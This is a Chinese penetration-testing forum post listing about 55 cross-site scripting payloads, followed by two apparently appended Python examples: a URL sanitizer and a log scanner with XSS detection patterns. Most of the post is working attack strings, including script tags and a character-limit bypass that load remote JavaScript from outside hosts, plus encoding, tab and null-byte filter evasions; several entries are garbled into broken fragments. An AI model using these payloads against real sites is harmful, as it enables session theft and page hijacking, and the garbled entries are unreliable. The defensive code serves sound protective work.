中国网络渗透测试联盟

Title: XSS attack roundup

Author: admin    Time: 2016-4-28 10:06
(1) Plain XSS JavaScript injection

<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(99) Alternative pop-ups

<q/oncut=alert()>1
<s/onclick=alert()>b
<XSS=" onclick="alert(1)//">clickme</SSX=">
<zzz onclick=alert`1`>clickme</zzz>
<a onclick=alert`1`>clickme</a>
<a=">clickme</a=">
<a=">clickme</a>
<z=">clickme</z=">
<z onclick=alert`1`>clickme</z>

(2) IMG tag XSS using a JavaScript command

<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(3) IMG tag, no semicolon and no quotes

<IMG SRC=javascript:alert('XSS')>

(4) IMG tag, case insensitive

<IMG SRC=JaVaScRiPt:alert('XSS')>

(5) HTML encoding (semicolons required)

<IMG SRC=javascript:alert("XSS")>

(6) Malformed IMG tag

<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

(7) fromCharCode (calculator)

<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

(8) UTF-8 Unicode encoding (calculator)

<IMG SRC=jav..省略..S')>

(9) 7-bit UTF-8 Unicode encoding without semicolons (calculator)

<IMG SRC=jav..省略..S')>

(10) Hex encoding, also without semicolons (calculator)

<IMG SRC=\'#\'" /span>

(11) Embedded tab splitting up "javascript"

<IMG SRC=\'#\'" ascript:alert('XSS');">

(12) Embedded encoded tab splitting up "javascript"

<IMG SRC=\'#\'" ascript:alert('XSS');">

(13) Embedded newline

<IMG SRC=\'#\'" ascript:alert('XSS');">

(14) Embedded carriage return

<IMG SRC=\'#\'" ascript:alert('XSS');">

(15) Embedded multi-line JavaScript injection, an extreme XSS example

<IMG SRC=\'#\'" /span>

(16) Getting around character limits (must be on the same page)

<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval(z)</script>

(17) Null character

perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

(18) Null character 2; null characters are basically ineffective here in China, because there is nowhere they can be exploited

perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out

(19) Spaces and meta characters before the JavaScript in an IMG tag

<IMG SRC=\'#\'"   javascript:alert('XSS');">

(20) Non-alpha-non-digit XSS

<SCRIPT/XSS SRC=\'#\'" /span>http://3w.org/XSS/xss.js"></SCRIPT>

(21) Non-alpha-non-digit XSS 2

<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

(22) Non-alpha-non-digit XSS 3

<SCRIPT/SRC=\'#\'" /span>http://3w.org/XSS/xss.js"></SCRIPT>

(23) Double open brackets

<<SCRIPT>alert("XSS");//<</SCRIPT>

(24) No closing script tag (Firefox and similar browsers only)

<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>

(25) No closing script tag 2

<SCRIPT SRC=//3w.org/XSS/xss.js>

(26) Half-open HTML/JavaScript XSS

<IMG SRC=\'#\'" /span>

(27) Double open angle brackets

<iframe src=http://3w.org/XSS.html <

(28) No single quotes, double quotes or semicolons

<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>

(29) Escaping JavaScript escapes

\";alert('XSS');//

(30) Closing the TITLE tag

</TITLE><SCRIPT>alert("XSS");</SCRIPT>

(31) Input Image

<INPUT SRC=\'#\'" /span>

(32) BODY Image

<BODY BACKGROUND="javascript:alert('XSS')">

(33) BODY tag

<BODY('XSS')>

(34) IMG Dynsrc

<IMG DYNSRC=\'#\'" /span>

(35) IMG Lowsrc

<IMG LOWSRC=\'#\'" /span>

(36) BGSOUND

<BGSOUND SRC=\'#\'" /span>

(37) STYLE sheet

<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

(38) Remote stylesheet

<LINK REL="stylesheet" HREF="http://3w.org/xss.css">

(39) List-style-image

<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS

(40) IMG VBscript

<IMG SRC=\'#\'" /STYLE><UL><LI>XSS

(41) META link URL

<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">

(42) Iframe

<IFRAME SRC=\'#\'" /IFRAME>

(43) Frame

<FRAMESET><FRAME SRC=\'#\'" /FRAMESET>

(44) Table

<TABLE BACKGROUND="javascript:alert('XSS')">

(45) TD

<TABLE><TD BACKGROUND="javascript:alert('XSS')">

(46) DIV background-image

<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(47) DIV background-image with extra characters prepended (1-32&34&39&160&8192-8&13&12288&65279)

<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(48) DIV expression

<DIV STYLE="width: expression(alert('XSS'));">

(49) STYLE attribute with a split-up expression

<IMG STYLE="xss:expression(alert('XSS'))">

(50) Anonymous tag with STYLE (made of an open angle bracket followed by a letter)

<XSS STYLE="xss:expression(alert('XSS'))">

(51) STYLE background-image

<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

(52) IMG STYLE method

exppression(alert("XSS"))'>

(53) STYLE background

<STYLE><STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

(54) BASE

<BASE HREF="javascript:alert('XSS');//">

(55) EMBED tag: you can embed Flash that contains XSS

<EMBED SRC=\'#\'" /span>http://3w.org/XSS/xss.swf" ></EMBED>
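Most of the vectors in items 3-19 and 32-54 rely on one weakness: a URL-bearing attribute (SRC, HREF, BACKGROUND, CSS url()) accepts a javascript: scheme that has been disguised by case changes, HTML character references, percent-encoding, or embedded tabs, newlines and NULs. The Python below is an added example and not code from the original post; it shows the defensive counterpart, which is to decode and squeeze the value the way a lenient browser would before checking its scheme against an allow-list, and to escape anything placed into an attribute or text node. The allow-list, the _EXTRA_IGNORED set, the function names and the sample URLs are assumptions constructed for this example.

```python
import html
import re
from typing import Optional
from urllib.parse import unquote

# Schemes an image or link attribute may carry. "javascript:", "vbscript:"
# and "data:" are absent on purpose. The allow-list is an assumption for
# this example; choose it per attribute in a real application.
ALLOWED_SCHEMES = {"http", "https", "mailto"}

# ASCII controls and Unicode whitespace cover most of the code points that
# item 47 lists as skipped by browsers; zero-width space and the BOM are
# added on top as an assumption for this example.
_EXTRA_IGNORED = {0x200B, 0xFEFF}

_SCHEME_RE = re.compile(r"^([a-z][a-z0-9+.\-]*):")


def normalize_for_scheme_check(url: str) -> str:
    """Peel off the layers the list wraps around "javascript:" so the
    scheme can be compared honestly: HTML character references with or
    without semicolons (items 5, 8-10), percent-encoding, and the control
    or whitespace characters that split the word (items 11-14, 17, 19)."""
    decoded = unquote(html.unescape(url))
    squeezed = "".join(
        ch for ch in decoded
        if ord(ch) > 32 and not ch.isspace() and ord(ch) not in _EXTRA_IGNORED
    )
    return squeezed.lower()


def url_scheme(url: str) -> Optional[str]:
    """Scheme a browser would act on, or None for a relative URL."""
    match = _SCHEME_RE.match(normalize_for_scheme_check(url))
    return match.group(1) if match else None


def safe_src(url: str) -> Optional[str]:
    """Return the URL escaped for an HTML attribute, or None if it must be
    dropped. Policy: an explicit scheme must be allow-listed; raw control
    characters and protocol-relative "//host" (item 25) are rejected;
    ordinary relative paths are kept."""
    if any(ord(ch) < 32 for ch in url):
        return None
    scheme = url_scheme(url)
    if scheme is None:
        if normalize_for_scheme_check(url).startswith("//"):
            return None
    elif scheme not in ALLOWED_SCHEMES:
        return None
    # Attribute-context escaping: quotes, <, > and & become entities, so the
    # attribute-breakout vectors (items 6, 29) stay inside the value.
    return html.escape(url, quote=True)


def render_img(url: str) -> str:
    """Emit an <img> tag, or nothing at all when the URL is unsafe."""
    value = safe_src(url)
    return f'<img src="{value}">' if value is not None else ""


def escape_text(text: str) -> str:
    """Escape untrusted text for an HTML text node; every vector above that
    begins with "<" is then displayed literally instead of parsed."""
    return html.escape(text, quote=True)


if __name__ == "__main__":
    # Constructed samples taken from the vectors in the list above.
    samples = [
        "javascript:alert('XSS')",
        "JaVaScRiPt:alert('XSS')",
        "jav\tascript:alert('XSS')",
        "jav&#x09;ascript:alert('XSS')",
        "java\0script:alert('XSS')",
        "&#14;  javascript:alert('XSS')",
        "&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58alert('XSS')",
        "vbscript:msgbox('XSS')",
        "//3w.org/XSS/xss.js",
        "/images/logo.png",
        "https://example.com/a.png",
    ]
    for sample in samples:
        print(repr(sample), "->", render_img(sample) or "(dropped)")
```

The decision is made on the normalized copy, but the value that reaches the page is the original, escaped; rejecting any value that still contains raw control characters keeps the two from diverging. Note that html.unescape, like a browser, resolves numeric references that lack a trailing semicolon, which is exactly what items 9 and 10 count on.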

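Seen from the logging side, the same evasions show up as request parameters that only look like markup after decoding. The scanner below is an added example, not code from the original post: it percent-decodes (twice, to catch double-encoding) and resolves character references, strips the characters that split "javascript" or "script" (items 11-14, 17, 18), and then classifies each line against the vector families listed above: script tags, event handlers with junk between name and "=" (items 99, 21), script-scheme URLs, CSS expression() and self-loading tags. The access-log lines are constructed for this example, and the pattern set is an assumption meant as a starting point for tuning, not a complete ruleset.

```python
import html
import re
from urllib.parse import unquote, unquote_plus

# Constructed access-log lines (not real traffic). The request targets carry
# URL-encoded copies of vectors from the list above.
SAMPLE_LOG = """\
10.0.0.5 - - [28/Apr/2016:10:06:01 +0800] "GET /search?q=shoes HTTP/1.1" 200 512
10.0.0.7 - - [28/Apr/2016:10:06:02 +0800] "GET /search?q=%3CSCRIPT%20SRC%3Dhttp%3A%2F%2F3w.org%2FXSS%2Fxss.js%3E%3C%2FSCRIPT%3E HTTP/1.1" 200 512
10.0.0.7 - - [28/Apr/2016:10:06:03 +0800] "GET /profile?img=%3CIMG%20SRC%3Djav%09ascript%3Aalert%28%27XSS%27%29%3E HTTP/1.1" 200 512
10.0.0.9 - - [28/Apr/2016:10:06:04 +0800] "GET /post?body=%3Cq%2Foncut%3Dalert%28%29%3E1 HTTP/1.1" 200 512
10.0.0.9 - - [28/Apr/2016:10:06:05 +0800] "GET /post?body=%3CDIV%20STYLE%3D%22width%3A%20expression%28alert%28%27XSS%27%29%29%3B%22%3E HTTP/1.1" 200 512
10.0.0.9 - - [28/Apr/2016:10:06:06 +0800] "GET /post?body=%3CBODY%20onload%21%23%24%25%26%28%29%2A%7E%2B-_.%2C%3A%3B%3F%40%5B%2F%7C%5C%5D%5E%60%3Dalert%28%22XSS%22%29%3E HTTP/1.1" 200 512
10.0.0.4 - - [28/Apr/2016:10:06:07 +0800] "GET /post?body=%3CIFRAME%20SRC%3Dhttp%3A%2F%2F3w.org%2FXSS.html%3E HTTP/1.1" 200 512
"""

# Matched against the "squeezed" form (all whitespace and control characters
# removed) so that jav<TAB>ascript:, java<NUL>script: and <SCR<NUL>IPT>
# (items 11-14, 17, 18) collapse back to the plain keyword.
SQUEEZED_PATTERNS = {
    "script_tag": re.compile(r"<script"),                        # items 1, 20, 22-25
    "js_scheme": re.compile(r"(?:javascript|vbscript|data):"),   # items 3-19, 32-54
    "css_expression": re.compile(r"expression\("),               # items 48-50
}

# Matched on the decoded, lower-cased text with whitespace kept.
LOOSE_PATTERNS = {
    # A tag whose attribute list contains on<name> ... = ; the junk a lenient
    # parser tolerates between the name and "=" (item 21) is allowed for.
    "event_handler": re.compile(r"<[^>]*?[\s/\"']on[a-z]+[^=>]*="),
    # Tags that load or redirect on their own (items 27, 36-39, 41-43, 54, 55).
    "dangerous_tag": re.compile(
        r"<(?:iframe|frame|frameset|embed|object|base|meta|link|bgsound|style)\b"
    ),
}


def decode_layers(text):
    """Undo the encodings stacked on a payload: '+' and percent-encoding
    (a second pass catches double-encoding), then HTML character references."""
    return html.unescape(unquote(unquote_plus(text))).lower()


def squeeze(text):
    """Drop every whitespace and control character."""
    return "".join(ch for ch in text if ord(ch) > 32 and not ch.isspace())


def classify(text):
    """Return the sorted list of vector families found in one string."""
    decoded = decode_layers(text)
    squeezed = squeeze(decoded)
    hits = [name for name, rx in SQUEEZED_PATTERNS.items() if rx.search(squeezed)]
    hits += [name for name, rx in LOOSE_PATTERNS.items() if rx.search(decoded)]
    return sorted(hits)


def scan_log(log_text):
    """(line number, categories) for every line that triggers a pattern."""
    findings = []
    for number, line in enumerate(log_text.splitlines(), start=1):
        categories = classify(line)
        if categories:
            findings.append((number, categories))
    return findings


if __name__ == "__main__":
    for number, categories in scan_log(SAMPLE_LOG):
        print(f"line {number}: {', '.join(categories)}")
```

Decoding before matching is the part that matters: a rule written against the raw log line would see only percent-escapes, and a rule written against the decoded but unsqueezed text would miss the tab and NUL variants. The event-handler pattern is deliberately loose and will flag some benign markup, which is the usual trade-off for this class of heuristic.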




Welcome to 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2